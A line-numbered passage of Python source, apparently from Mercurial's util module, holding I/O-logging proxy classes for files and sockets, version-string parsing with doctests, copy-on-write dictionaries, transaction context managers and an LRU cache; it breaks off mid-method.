406 406 r'_observer',
407 407 )
408 408
409 409 def __init__(self, fh, observer):
410 410 object.__setattr__(self, r'_orig', fh)
411 411 object.__setattr__(self, r'_observer', observer)
412 412
413 413 def __getattribute__(self, name):
414 414 ours = {
415 415 r'_observer',
416 416
417 417 # IOBase
418 418 r'close',
419 419 # closed if a property
420 420 r'fileno',
421 421 r'flush',
422 422 r'isatty',
423 423 r'readable',
424 424 r'readline',
425 425 r'readlines',
426 426 r'seek',
427 427 r'seekable',
428 428 r'tell',
429 429 r'truncate',
430 430 r'writable',
431 431 r'writelines',
432 432 # RawIOBase
433 433 r'read',
434 434 r'readall',
435 435 r'readinto',
436 436 r'write',
437 437 # BufferedIOBase
438 438 # raw is a property
439 439 r'detach',
440 440 # read defined above
441 441 r'read1',
442 442 # readinto defined above
443 443 # write defined above
444 444 }
445 445
446 446 # We only observe some methods.
447 447 if name in ours:
448 448 return object.__getattribute__(self, name)
449 449
450 450 return getattr(object.__getattribute__(self, r'_orig'), name)
451 451
452 452 def __nonzero__(self):
453 453 return bool(object.__getattribute__(self, r'_orig'))
454 454
455 455 __bool__ = __nonzero__
456 456
457 457 def __delattr__(self, name):
458 458 return delattr(object.__getattribute__(self, r'_orig'), name)
459 459
460 460 def __setattr__(self, name, value):
461 461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462 462
463 463 def __iter__(self):
464 464 return object.__getattribute__(self, r'_orig').__iter__()
465 465
466 466 def _observedcall(self, name, *args, **kwargs):
467 467 # Call the original object.
468 468 orig = object.__getattribute__(self, r'_orig')
469 469 res = getattr(orig, name)(*args, **kwargs)
470 470
471 471 # Call a method on the observer of the same name with arguments
472 472 # so it can react, log, etc.
473 473 observer = object.__getattribute__(self, r'_observer')
474 474 fn = getattr(observer, name, None)
475 475 if fn:
476 476 fn(res, *args, **kwargs)
477 477
478 478 return res
479 479
480 480 def close(self, *args, **kwargs):
481 481 return object.__getattribute__(self, r'_observedcall')(
482 482 r'close', *args, **kwargs)
483 483
484 484 def fileno(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'fileno', *args, **kwargs)
487 487
488 488 def flush(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'flush', *args, **kwargs)
491 491
492 492 def isatty(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'isatty', *args, **kwargs)
495 495
496 496 def readable(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'readable', *args, **kwargs)
499 499
500 500 def readline(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readline', *args, **kwargs)
503 503
504 504 def readlines(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readlines', *args, **kwargs)
507 507
508 508 def seek(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'seek', *args, **kwargs)
511 511
512 512 def seekable(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seekable', *args, **kwargs)
515 515
516 516 def tell(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'tell', *args, **kwargs)
519 519
520 520 def truncate(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'truncate', *args, **kwargs)
523 523
524 524 def writable(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'writable', *args, **kwargs)
527 527
528 528 def writelines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writelines', *args, **kwargs)
531 531
532 532 def read(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'read', *args, **kwargs)
535 535
536 536 def readall(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'readall', *args, **kwargs)
539 539
540 540 def readinto(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readinto', *args, **kwargs)
543 543
544 544 def write(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'write', *args, **kwargs)
547 547
548 548 def detach(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'detach', *args, **kwargs)
551 551
552 552 def read1(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'read1', *args, **kwargs)
555 555
556 556 class observedbufferedinputpipe(bufferedinputpipe):
557 557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558 558
559 559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 560 bypass ``fileobjectproxy``. Because of this, we need to make
561 561 ``bufferedinputpipe`` aware of these operations.
562 562
563 563 This variation of ``bufferedinputpipe`` can notify observers about
564 564 ``os.read()`` events. It also re-publishes other events, such as
565 565 ``read()`` and ``readline()``.
566 566 """
567 567 def _fillbuffer(self):
568 568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569 569
570 570 fn = getattr(self._input._observer, r'osread', None)
571 571 if fn:
572 572 fn(res, _chunksize)
573 573
574 574 return res
575 575
576 576 # We use different observer methods because the operation isn't
577 577 # performed on the actual file object but on us.
578 578 def read(self, size):
579 579 res = super(observedbufferedinputpipe, self).read(size)
580 580
581 581 fn = getattr(self._input._observer, r'bufferedread', None)
582 582 if fn:
583 583 fn(res, size)
584 584
585 585 return res
586 586
587 587 def readline(self, *args, **kwargs):
588 588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589 589
590 590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 591 if fn:
592 592 fn(res)
593 593
594 594 return res
595 595
596 596 PROXIED_SOCKET_METHODS = {
597 597 r'makefile',
598 598 r'recv',
599 599 r'recvfrom',
600 600 r'recvfrom_into',
601 601 r'recv_into',
602 602 r'send',
603 603 r'sendall',
604 604 r'sendto',
605 605 r'setblocking',
606 606 r'settimeout',
607 607 r'gettimeout',
608 608 r'setsockopt',
609 609 }
610 610
611 611 class socketproxy(object):
612 612 """A proxy around a socket that tells a watcher when events occur.
613 613
614 614 This is like ``fileobjectproxy`` except for sockets.
615 615
616 616 This type is intended to only be used for testing purposes. Think hard
617 617 before using it in important code.
618 618 """
619 619 __slots__ = (
620 620 r'_orig',
621 621 r'_observer',
622 622 )
623 623
624 624 def __init__(self, sock, observer):
625 625 object.__setattr__(self, r'_orig', sock)
626 626 object.__setattr__(self, r'_observer', observer)
627 627
628 628 def __getattribute__(self, name):
629 629 if name in PROXIED_SOCKET_METHODS:
630 630 return object.__getattribute__(self, name)
631 631
632 632 return getattr(object.__getattribute__(self, r'_orig'), name)
633 633
634 634 def __delattr__(self, name):
635 635 return delattr(object.__getattribute__(self, r'_orig'), name)
636 636
637 637 def __setattr__(self, name, value):
638 638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639 639
640 640 def __nonzero__(self):
641 641 return bool(object.__getattribute__(self, r'_orig'))
642 642
643 643 __bool__ = __nonzero__
644 644
645 645 def _observedcall(self, name, *args, **kwargs):
646 646 # Call the original object.
647 647 orig = object.__getattribute__(self, r'_orig')
648 648 res = getattr(orig, name)(*args, **kwargs)
649 649
650 650 # Call a method on the observer of the same name with arguments
651 651 # so it can react, log, etc.
652 652 observer = object.__getattribute__(self, r'_observer')
653 653 fn = getattr(observer, name, None)
654 654 if fn:
655 655 fn(res, *args, **kwargs)
656 656
657 657 return res
658 658
659 659 def makefile(self, *args, **kwargs):
660 660 res = object.__getattribute__(self, r'_observedcall')(
661 661 r'makefile', *args, **kwargs)
662 662
663 663 # The file object may be used for I/O. So we turn it into a
664 664 # proxy using our observer.
665 665 observer = object.__getattribute__(self, r'_observer')
666 666 return makeloggingfileobject(observer.fh, res, observer.name,
667 667 reads=observer.reads,
668 668 writes=observer.writes,
669 669 logdata=observer.logdata,
670 670 logdataapis=observer.logdataapis)
671 671
672 672 def recv(self, *args, **kwargs):
673 673 return object.__getattribute__(self, r'_observedcall')(
674 674 r'recv', *args, **kwargs)
675 675
676 676 def recvfrom(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recvfrom', *args, **kwargs)
679 679
680 680 def recvfrom_into(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom_into', *args, **kwargs)
683 683
684 684 def recv_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recv_info', *args, **kwargs)
687 687
688 688 def send(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'send', *args, **kwargs)
691 691
692 692 def sendall(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'sendall', *args, **kwargs)
695 695
696 696 def sendto(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendto', *args, **kwargs)
699 699
700 700 def setblocking(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'setblocking', *args, **kwargs)
703 703
704 704 def settimeout(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'settimeout', *args, **kwargs)
707 707
708 708 def gettimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'gettimeout', *args, **kwargs)
711 711
712 712 def setsockopt(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'setsockopt', *args, **kwargs)
715 715
716 716 class baseproxyobserver(object):
717 717 def _writedata(self, data):
718 718 if not self.logdata:
719 719 if self.logdataapis:
720 720 self.fh.write('\n')
721 721 self.fh.flush()
722 722 return
723 723
724 724 # Simple case writes all data on a single line.
725 725 if b'\n' not in data:
726 726 if self.logdataapis:
727 727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 728 else:
729 729 self.fh.write('%s> %s\n'
730 730 % (self.name, stringutil.escapestr(data)))
731 731 self.fh.flush()
732 732 return
733 733
734 734 # Data with newlines is written to multiple lines.
735 735 if self.logdataapis:
736 736 self.fh.write(':\n')
737 737
738 738 lines = data.splitlines(True)
739 739 for line in lines:
740 740 self.fh.write('%s> %s\n'
741 741 % (self.name, stringutil.escapestr(line)))
742 742 self.fh.flush()
743 743
744 744 class fileobjectobserver(baseproxyobserver):
745 745 """Logs file object activity."""
746 746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 747 logdataapis=True):
748 748 self.fh = fh
749 749 self.name = name
750 750 self.logdata = logdata
751 751 self.logdataapis = logdataapis
752 752 self.reads = reads
753 753 self.writes = writes
754 754
755 755 def read(self, res, size=-1):
756 756 if not self.reads:
757 757 return
758 758 # Python 3 can return None from reads at EOF instead of empty strings.
759 759 if res is None:
760 760 res = ''
761 761
762 762 if size == -1 and res == '':
763 763 # Suppress pointless read(-1) calls that return
764 764 # nothing. These happen _a lot_ on Python 3, and there
765 765 # doesn't seem to be a better workaround to have matching
766 766 # Python 2 and 3 behavior. :(
767 767 return
768 768
769 769 if self.logdataapis:
770 770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771 771
772 772 self._writedata(res)
773 773
774 774 def readline(self, res, limit=-1):
775 775 if not self.reads:
776 776 return
777 777
778 778 if self.logdataapis:
779 779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780 780
781 781 self._writedata(res)
782 782
783 783 def readinto(self, res, dest):
784 784 if not self.reads:
785 785 return
786 786
787 787 if self.logdataapis:
788 788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 789 res))
790 790
791 791 data = dest[0:res] if res is not None else b''
792 792
793 793 # _writedata() uses "in" operator and is confused by memoryview because
794 794 # characters are ints on Python 3.
795 795 if isinstance(data, memoryview):
796 796 data = data.tobytes()
797 797
798 798 self._writedata(data)
799 799
800 800 def write(self, res, data):
801 801 if not self.writes:
802 802 return
803 803
804 804 # Python 2 returns None from some write() calls. Python 3 (reasonably)
805 805 # returns the integer bytes written.
806 806 if res is None and data:
807 807 res = len(data)
808 808
809 809 if self.logdataapis:
810 810 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
811 811
812 812 self._writedata(data)
813 813
814 814 def flush(self, res):
815 815 if not self.writes:
816 816 return
817 817
818 818 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
819 819
820 820 # For observedbufferedinputpipe.
821 821 def bufferedread(self, res, size):
822 822 if not self.reads:
823 823 return
824 824
825 825 if self.logdataapis:
826 826 self.fh.write('%s> bufferedread(%d) -> %d' % (
827 827 self.name, size, len(res)))
828 828
829 829 self._writedata(res)
830 830
831 831 def bufferedreadline(self, res):
832 832 if not self.reads:
833 833 return
834 834
835 835 if self.logdataapis:
836 836 self.fh.write('%s> bufferedreadline() -> %d' % (
837 837 self.name, len(res)))
838 838
839 839 self._writedata(res)
840 840
841 841 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
842 842 logdata=False, logdataapis=True):
843 843 """Turn a file object into a logging file object."""
844 844
845 845 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
846 846 logdata=logdata, logdataapis=logdataapis)
847 847 return fileobjectproxy(fh, observer)
848 848
849 849 class socketobserver(baseproxyobserver):
850 850 """Logs socket activity."""
851 851 def __init__(self, fh, name, reads=True, writes=True, states=True,
852 852 logdata=False, logdataapis=True):
853 853 self.fh = fh
854 854 self.name = name
855 855 self.reads = reads
856 856 self.writes = writes
857 857 self.states = states
858 858 self.logdata = logdata
859 859 self.logdataapis = logdataapis
860 860
861 861 def makefile(self, res, mode=None, bufsize=None):
862 862 if not self.states:
863 863 return
864 864
865 865 self.fh.write('%s> makefile(%r, %r)\n' % (
866 866 self.name, mode, bufsize))
867 867
868 868 def recv(self, res, size, flags=0):
869 869 if not self.reads:
870 870 return
871 871
872 872 if self.logdataapis:
873 873 self.fh.write('%s> recv(%d, %d) -> %d' % (
874 874 self.name, size, flags, len(res)))
875 875 self._writedata(res)
876 876
877 877 def recvfrom(self, res, size, flags=0):
878 878 if not self.reads:
879 879 return
880 880
881 881 if self.logdataapis:
882 882 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
883 883 self.name, size, flags, len(res[0])))
884 884
885 885 self._writedata(res[0])
886 886
887 887 def recvfrom_into(self, res, buf, size, flags=0):
888 888 if not self.reads:
889 889 return
890 890
891 891 if self.logdataapis:
892 892 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
893 893 self.name, size, flags, res[0]))
894 894
895 895 self._writedata(buf[0:res[0]])
896 896
897 897 def recv_into(self, res, buf, size=0, flags=0):
898 898 if not self.reads:
899 899 return
900 900
901 901 if self.logdataapis:
902 902 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
903 903 self.name, size, flags, res))
904 904
905 905 self._writedata(buf[0:res])
906 906
907 907 def send(self, res, data, flags=0):
908 908 if not self.writes:
909 909 return
910 910
911 911 self.fh.write('%s> send(%d, %d) -> %d' % (
912 912 self.name, len(data), flags, len(res)))
913 913 self._writedata(data)
914 914
915 915 def sendall(self, res, data, flags=0):
916 916 if not self.writes:
917 917 return
918 918
919 919 if self.logdataapis:
920 920 # Returns None on success. So don't bother reporting return value.
921 921 self.fh.write('%s> sendall(%d, %d)' % (
922 922 self.name, len(data), flags))
923 923
924 924 self._writedata(data)
925 925
926 926 def sendto(self, res, data, flagsoraddress, address=None):
927 927 if not self.writes:
928 928 return
929 929
930 930 if address:
931 931 flags = flagsoraddress
932 932 else:
933 933 flags = 0
934 934
935 935 if self.logdataapis:
936 936 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
937 937 self.name, len(data), flags, address, res))
938 938
939 939 self._writedata(data)
940 940
941 941 def setblocking(self, res, flag):
942 942 if not self.states:
943 943 return
944 944
945 945 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
946 946
947 947 def settimeout(self, res, value):
948 948 if not self.states:
949 949 return
950 950
951 951 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
952 952
953 953 def gettimeout(self, res):
954 954 if not self.states:
955 955 return
956 956
957 957 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
958 958
959 959 def setsockopt(self, res, level, optname, value):
960 960 if not self.states:
961 961 return
962 962
963 963 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
964 964 self.name, level, optname, value, res))
965 965
966 966 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
967 967 logdata=False, logdataapis=True):
968 968 """Turn a socket into a logging socket."""
969 969
970 970 observer = socketobserver(logh, name, reads=reads, writes=writes,
971 971 states=states, logdata=logdata,
972 972 logdataapis=logdataapis)
973 973 return socketproxy(fh, observer)
974 974
975 975 def version():
976 976 """Return version information if available."""
977 977 try:
978 978 from . import __version__
979 979 return __version__.version
980 980 except ImportError:
981 981 return 'unknown'
982 982
983 983 def versiontuple(v=None, n=4):
984 984 """Parses a Mercurial version string into an N-tuple.
985 985
986 986 The version string to be parsed is specified with the ``v`` argument.
987 987 If it isn't defined, the current Mercurial version string will be parsed.
988 988
989 989 ``n`` can be 2, 3, or 4. Here is how some version strings map to
990 990 returned values:
991 991
992 992 >>> v = b'3.6.1+190-df9b73d2d444'
993 993 >>> versiontuple(v, 2)
994 994 (3, 6)
995 995 >>> versiontuple(v, 3)
996 996 (3, 6, 1)
997 997 >>> versiontuple(v, 4)
998 998 (3, 6, 1, '190-df9b73d2d444')
999 999
1000 1000 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1001 1001 (3, 6, 1, '190-df9b73d2d444+20151118')
1002 1002
1003 1003 >>> v = b'3.6'
1004 1004 >>> versiontuple(v, 2)
1005 1005 (3, 6)
1006 1006 >>> versiontuple(v, 3)
1007 1007 (3, 6, None)
1008 1008 >>> versiontuple(v, 4)
1009 1009 (3, 6, None, None)
1010 1010
1011 1011 >>> v = b'3.9-rc'
1012 1012 >>> versiontuple(v, 2)
1013 1013 (3, 9)
1014 1014 >>> versiontuple(v, 3)
1015 1015 (3, 9, None)
1016 1016 >>> versiontuple(v, 4)
1017 1017 (3, 9, None, 'rc')
1018 1018
1019 1019 >>> v = b'3.9-rc+2-02a8fea4289b'
1020 1020 >>> versiontuple(v, 2)
1021 1021 (3, 9)
1022 1022 >>> versiontuple(v, 3)
1023 1023 (3, 9, None)
1024 1024 >>> versiontuple(v, 4)
1025 1025 (3, 9, None, 'rc+2-02a8fea4289b')
1026 1026
1027 1027 >>> versiontuple(b'4.6rc0')
1028 1028 (4, 6, None, 'rc0')
1029 1029 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1030 1030 (4, 6, None, 'rc0+12-425d55e54f98')
1031 1031 >>> versiontuple(b'.1.2.3')
1032 1032 (None, None, None, '.1.2.3')
1033 1033 >>> versiontuple(b'12.34..5')
1034 1034 (12, 34, None, '..5')
1035 1035 >>> versiontuple(b'1.2.3.4.5.6')
1036 1036 (1, 2, 3, '.4.5.6')
1037 1037 """
1038 1038 if not v:
1039 1039 v = version()
1040 1040 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1041 1041 if not m:
1042 1042 vparts, extra = '', v
1043 1043 elif m.group(2):
1044 1044 vparts, extra = m.groups()
1045 1045 else:
1046 1046 vparts, extra = m.group(1), None
1047 1047
1048 1048 vints = []
1049 1049 for i in vparts.split('.'):
1050 1050 try:
1051 1051 vints.append(int(i))
1052 1052 except ValueError:
1053 1053 break
1054 1054 # (3, 6) -> (3, 6, None)
1055 1055 while len(vints) < 3:
1056 1056 vints.append(None)
1057 1057
1058 1058 if n == 2:
1059 1059 return (vints[0], vints[1])
1060 1060 if n == 3:
1061 1061 return (vints[0], vints[1], vints[2])
1062 1062 if n == 4:
1063 1063 return (vints[0], vints[1], vints[2], extra)
1064 1064
1065 1065 def cachefunc(func):
1066 1066 '''cache the result of function calls'''
1067 1067 # XXX doesn't handle keywords args
1068 1068 if func.__code__.co_argcount == 0:
1069 1069 cache = []
1070 1070 def f():
1071 1071 if len(cache) == 0:
1072 1072 cache.append(func())
1073 1073 return cache[0]
1074 1074 return f
1075 1075 cache = {}
1076 1076 if func.__code__.co_argcount == 1:
1077 1077 # we gain a small amount of time because
1078 1078 # we don't need to pack/unpack the list
1079 1079 def f(arg):
1080 1080 if arg not in cache:
1081 1081 cache[arg] = func(arg)
1082 1082 return cache[arg]
1083 1083 else:
1084 1084 def f(*args):
1085 1085 if args not in cache:
1086 1086 cache[args] = func(*args)
1087 1087 return cache[args]
1088 1088
1089 1089 return f
1090 1090
1091 1091 class cow(object):
1092 1092 """helper class to make copy-on-write easier
1093 1093
1094 1094 Call preparewrite before doing any writes.
1095 1095 """
1096 1096
1097 1097 def preparewrite(self):
1098 1098 """call this before writes, return self or a copied new object"""
1099 1099 if getattr(self, '_copied', 0):
1100 1100 self._copied -= 1
1101 1101 return self.__class__(self)
1102 1102 return self
1103 1103
1104 1104 def copy(self):
1105 1105 """always do a cheap copy"""
1106 1106 self._copied = getattr(self, '_copied', 0) + 1
1107 1107 return self
1108 1108
1109 1109 class sortdict(collections.OrderedDict):
1110 1110 '''a simple sorted dictionary
1111 1111
1112 1112 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1113 1113 >>> d2 = d1.copy()
1114 1114 >>> d2
1115 1115 sortdict([('a', 0), ('b', 1)])
1116 1116 >>> d2.update([(b'a', 2)])
1117 1117 >>> list(d2.keys()) # should still be in last-set order
1118 1118 ['b', 'a']
1119 1119 '''
1120 1120
1121 1121 def __setitem__(self, key, value):
1122 1122 if key in self:
1123 1123 del self[key]
1124 1124 super(sortdict, self).__setitem__(key, value)
1125 1125
1126 1126 if pycompat.ispypy:
1127 1127 # __setitem__() isn't called as of PyPy 5.8.0
1128 1128 def update(self, src):
1129 1129 if isinstance(src, dict):
1130 1130 src = src.iteritems()
1131 1131 for k, v in src:
1132 1132 self[k] = v
1133 1133
1134 1134 class cowdict(cow, dict):
1135 1135 """copy-on-write dict
1136 1136
1137 1137 Be sure to call d = d.preparewrite() before writing to d.
1138 1138
1139 1139 >>> a = cowdict()
1140 1140 >>> a is a.preparewrite()
1141 1141 True
1142 1142 >>> b = a.copy()
1143 1143 >>> b is a
1144 1144 True
1145 1145 >>> c = b.copy()
1146 1146 >>> c is a
1147 1147 True
1148 1148 >>> a = a.preparewrite()
1149 1149 >>> b is a
1150 1150 False
1151 1151 >>> a is a.preparewrite()
1152 1152 True
1153 1153 >>> c = c.preparewrite()
1154 1154 >>> b is c
1155 1155 False
1156 1156 >>> b is b.preparewrite()
1157 1157 True
1158 1158 """
1159 1159
1160 1160 class cowsortdict(cow, sortdict):
1161 1161 """copy-on-write sortdict
1162 1162
1163 1163 Be sure to call d = d.preparewrite() before writing to d.
1164 1164 """
1165 1165
1166 1166 class transactional(object):
1167 1167 """Base class for making a transactional type into a context manager."""
1168 1168 __metaclass__ = abc.ABCMeta
1169 1169
1170 1170 @abc.abstractmethod
1171 1171 def close(self):
1172 1172 """Successfully closes the transaction."""
1173 1173
1174 1174 @abc.abstractmethod
1175 1175 def release(self):
1176 1176 """Marks the end of the transaction.
1177 1177
1178 1178 If the transaction has not been closed, it will be aborted.
1179 1179 """
1180 1180
1181 1181 def __enter__(self):
1182 1182 return self
1183 1183
1184 1184 def __exit__(self, exc_type, exc_val, exc_tb):
1185 1185 try:
1186 1186 if exc_type is None:
1187 1187 self.close()
1188 1188 finally:
1189 1189 self.release()
1190 1190
1191 1191 @contextlib.contextmanager
1192 1192 def acceptintervention(tr=None):
1193 1193 """A context manager that closes the transaction on InterventionRequired
1194 1194
1195 1195 If no transaction was provided, this simply runs the body and returns
1196 1196 """
1197 1197 if not tr:
1198 1198 yield
1199 1199 return
1200 1200 try:
1201 1201 yield
1202 1202 tr.close()
1203 1203 except error.InterventionRequired:
1204 1204 tr.close()
1205 1205 raise
1206 1206 finally:
1207 1207 tr.release()
1208 1208
1209 1209 @contextlib.contextmanager
1210 1210 def nullcontextmanager():
1211 1211 yield
1212 1212
1213 1213 class _lrucachenode(object):
1214 1214 """A node in a doubly linked list.
1215 1215
1216 1216 Holds a reference to nodes on either side as well as a key-value
1217 1217 pair for the dictionary entry.
1218 1218 """
1219 1219 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1220 1220
1221 1221 def __init__(self):
1222 1222 self.next = None
1223 1223 self.prev = None
1224 1224
1225 1225 self.key = _notset
1226 1226 self.value = None
1227 1227 self.cost = 0
1228 1228
1229 1229 def markempty(self):
1230 1230 """Mark the node as emptied."""
1231 1231 self.key = _notset
1232 1232 self.value = None
1233 1233 self.cost = 0
1234 1234
1235 1235 class lrucachedict(object):
1236 1236 """Dict that caches most recent accesses and sets.
1237 1237
1238 1238 The dict consists of an actual backing dict - indexed by original
1239 1239 key - and a doubly linked circular list defining the order of entries in
1240 1240 the cache.
1241 1241
1242 1242 The head node is the newest entry in the cache. If the cache is full,
1243 1243 we recycle head.prev and make it the new head. Cache accesses result in
1244 1244 the node being moved to before the existing head and being marked as the
1245 1245 new head node.
1246 1246
1247 1247 Items in the cache can be inserted with an optional "cost" value. This is
1248 1248 simply an integer that is specified by the caller. The cache can be queried
1249 1249 for the total cost of all items presently in the cache.
1250 1250
1251 1251 The cache can also define a maximum cost. If a cache insertion would
1252 1252 cause the total cost of the cache to go beyond the maximum cost limit,
1253 1253 nodes will be evicted to make room for the new code. This can be used
1254 1254 to e.g. set a max memory limit and associate an estimated bytes size
1255 1255 cost to each item in the cache. By default, no maximum cost is enforced.
1256 1256 """
1257 1257 def __init__(self, max, maxcost=0):
1258 1258 self._cache = {}
1259 1259
1260 1260 self._head = head = _lrucachenode()
1261 1261 head.prev = head
1262 1262 head.next = head
1263 1263 self._size = 1
1264 1264 self.capacity = max
1265 1265 self.totalcost = 0
1266 1266 self.maxcost = maxcost
1267 1267
1268 1268 def __len__(self):
1269 1269 return len(self._cache)
1270 1270
1271 1271 def __contains__(self, k):
1272 1272 return k in self._cache
1273 1273
1274 1274 def __iter__(self):
1275 1275 # We don't have to iterate in cache order, but why not.
1276 1276 n = self._head
1277 1277 for i in range(len(self._cache)):
1278 1278 yield n.key
1279 1279 n = n.next
1280 1280
1281 1281 def __getitem__(self, k):
1282 1282 node = self._cache[k]
1283 1283 self._movetohead(node)
1284 1284 return node.value
1285 1285
1286 1286 def insert(self, k, v, cost=0):
1287 1287 """Insert a new item in the cache with optional cost value."""
1288 1288 node = self._cache.get(k)
1289 1289 # Replace existing value and mark as newest.
1290 1290 if node is not None:
1291 1291 self.totalcost -= node.cost
1292 1292 node.value = v
1293 1293 node.cost = cost
1294 1294 self.totalcost += cost
1295 1295 self._movetohead(node)
1296 1296
1297 1297 if self.maxcost:
1298 1298 self._enforcecostlimit()
1299 1299
1300 1300 return
1301 1301
1302 1302 if self._size < self.capacity:
1303 1303 node = self._addcapacity()
1304 1304 else:
1305 1305 # Grab the last/oldest item.
1306 1306 node = self._head.prev
1307 1307
1308 1308 # At capacity. Kill the old entry.
1309 1309 if node.key is not _notset:
1310 1310 self.totalcost -= node.cost
1311 1311 del self._cache[node.key]
1312 1312
1313 1313 node.key = k
1314 1314 node.value = v
1315 1315 node.cost = cost
1316 1316 self.totalcost += cost
1317 1317 self._cache[k] = node
1318 1318 # And mark it as newest entry. No need to adjust order since it
1319 1319 # is already self._head.prev.
1320 1320 self._head = node
1321 1321
1322 1322 if self.maxcost:
1323 1323 self._enforcecostlimit()
1324 1324
1325 1325 def __setitem__(self, k, v):
1326 1326 self.insert(k, v)
1327 1327
1328 1328 def __delitem__(self, k):
1329 1329 self.pop(k)
1330 1330
1331 1331 def pop(self, k, default=_notset):
1332 1332 try:
1333 1333 node = self._cache.pop(k)
1334 1334 except KeyError:
1335 1335 if default is _notset:
1336 1336 raise
1337 1337 return default
1338 1338 value = node.value
1339 1339 self.totalcost -= node.cost
1340 1340 node.markempty()
1341 1341
1342 1342 # Temporarily mark as newest item before re-adjusting head to make
1343 1343 # this node the oldest item.
1344 1344 self._movetohead(node)
1345 1345 self._head = node.next
1346 1346
1347 1347 return value
1348 1348
1349 1349 # Additional dict methods.
1350 1350
1351 1351 def get(self, k, default=None):
1352 1352 try:
1353 1353 return self.__getitem__(k)
1354 1354 except KeyError:
1355 1355 return default
1356 1356
1357 1357 def peek(self, k, default=_notset):
1358 1358 """Get the specified item without moving it to the head
1359 1359
1360 1360 Unlike get(), this doesn't mutate the internal state. But be aware
1361 1361 that it doesn't mean peek() is thread safe.
1362 1362 """
1363 1363 try:
1364 1364 node = self._cache[k]
1365 1365 return node.value
1366 1366 except KeyError:
1367 1367 if default is _notset:
1368 1368 raise
1369 1369 return default
1370 1370
1371 1371 def clear(self):
1372 1372 n = self._head
1373 1373 while n.key is not _notset:
1374 1374 self.totalcost -= n.cost
1375 1375 n.markempty()
1376 1376 n = n.next
1377 1377
1378 1378 self._cache.clear()
1379 1379
1380 1380 def copy(self, capacity=None, maxcost=0):
1381 1381 """Create a new cache as a copy of the current one.
1382 1382
1383 1383 By default, the new cache has the same capacity as the existing one.
1384 1384 But, the cache capacity can be changed as part of performing the
1385 1385 copy.
1386 1386
1387 1387 Items in the copy have an insertion/access order matching this
1388 1388 instance.
1389 1389 """
1390 1390
1391 1391 capacity = capacity or self.capacity
1392 1392 maxcost = maxcost or self.maxcost
1393 1393 result = lrucachedict(capacity, maxcost=maxcost)
1394 1394
1395 1395 # We copy entries by iterating in oldest-to-newest order so the copy
1396 1396 # has the correct ordering.
1397 1397
1398 1398 # Find the first non-empty entry.
1399 1399 n = self._head.prev
1400 1400 while n.key is _notset and n is not self._head:
1401 1401 n = n.prev
1402 1402
1403 1403 # We could potentially skip the first N items when decreasing capacity.
1404 1404 # But let's keep it simple unless it is a performance problem.
